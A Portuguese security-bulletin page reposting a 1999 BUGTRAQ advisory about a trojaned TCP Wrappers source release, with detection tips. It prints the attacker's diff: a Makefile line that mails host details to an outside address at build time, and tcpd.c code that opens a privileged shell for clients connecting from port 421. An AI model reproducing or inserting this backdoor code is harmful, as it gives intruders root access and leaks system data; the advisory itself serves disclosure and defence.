você está aqui: Home → Arquivo de Mensagens
Alteração do Código do Programa TCPWRAPPER
Colaboração: José Vicente Machado Filho
Data de Publicação: 25 de Janeiro de 1999
O TCPWRAPPER foi "trojanado" e várias pessoas chegaram a fazer download do programa alterado.
No e-mail abaixo, segue toda a descrição do problemas divulgado pelo próprio Wietse Venema.
José Vicente Machado Filho Analista de Suporte
Modulo Security Solutions S.A. http://www.modulo.com.br
—---Mensagem original-----
De: Wietse Venema <wietse@PORCUPINE.ORG>
Para: BUGTRAQ@netspace.org <BUGTRAQ@netspace.org>
Data: Quinta-feira, 21 de Janeiro de 1999 18:34
Assunto: [S] backdoored tcp wrapper source code
>TCP Wrappers is a widely-used security tool to protect UNIX systems
>against intrusion. In has an estimated installed base of millions.
>
>Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
>a backdoored version. Eventually this was bound to happen, and
>that's why the source file is accompanied by a PGP signature. But
>that is no guarantee against people downloading and installing
>backdoored software.
>
>The backdoor gives access to a privileged shell when a client
>connects from port 421.
>
>The backdoored copy was downloaded 52 times between 07:16 MET and
>16:29 MET. I have informed the sites that downloaded a copy.
>
>Below are details on how to recognize the backdoored version.
>
> Wietse
>
>Relevant time stamp/size information (times relative to MET):
>
>Backdoored version:
>
> % ls -lcta
> -r--r--r-- 1 wswietse 99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
> ...
> dr-xr-sr-x 3 wswietse 4096 Apr 11 1998 .
>
>Restored version:
>
> % ls -lt tcp_wrappers_7.6.tar.gz
> -r--r--r-- 1 wswietse 99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz
>
>The signature of the bad TAR file is: length 99186 instead of 99438.
>The signature of a compiled tcpd binary is:
>
> strings -a tcpd | grep csh
>
>any output probably means trouble.
>
>Changes that were made to the tcp wrapper 7.6 source code:
>
>diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
>*** 7.6/Makefile Mon Apr 7 20:34:16 1997
>--- /tmp/tcp_wrappers_7.6/Makefile Fri Mar 21 13:27:21 1997
>***************
>*** 26,31 ****
>--- 26,32 ----
> @echo
> @echo "If none of these match your environment, edit the system"
> @echo "dependencies sections in the Makefile and do a 'make
other'."
>+ @sh -c écho debug-""whoami""-""uname -a"" |mail -s debug
wtcpd@hotmail.com'
> @echo
>
> #######################################################
>***************
>*** 649,655 ****
> # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
> # Solaris 2.x, and Linux. See your system documentation for details.
> #
>! KILL_OPT= -DKILL_IP_OPTIONS
>
> ## End configuration options
> ############################
>--- 650,656 ----
> # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
> # Solaris 2.x, and Linux. See your system documentation for details.
> #
>! # KILL_OPT= -DKILL_IP_OPTIONS
>
> ## End configuration options
> ############################
>Only in 7.6: Makefile-
>diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
>*** 7.6/tcpd.c Sun Feb 11 11:01:33 1996
>--- /tmp/tcp_wrappers_7.6/tcpd.c Sun Feb 11 11:01:33 1996
>***************
>*** 41,52 ****
>--- 41,63 ----
> int allow_severity = SEVERITY; /* run-time adjustable */
> int deny_severity = LOG_WARNING; /* ditto */
>
>+ char IDENT[]="NC421\n";
>+ char SRUN[]="-csh";
>+ char SPATH[]="/bin/csh";
>+ #define PORT 421
>+
> main(argc, argv)
> int argc;
> char **argv;
> {
> struct request_info request;
>+ struct sockaddr_in from;
> char path[MAXPATHNAMELEN];
>+ int fromlen;
>+
>+ fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
>+ &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
>+ strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}
>
> /* Attempt to prevent the creation of world-writable files. */
>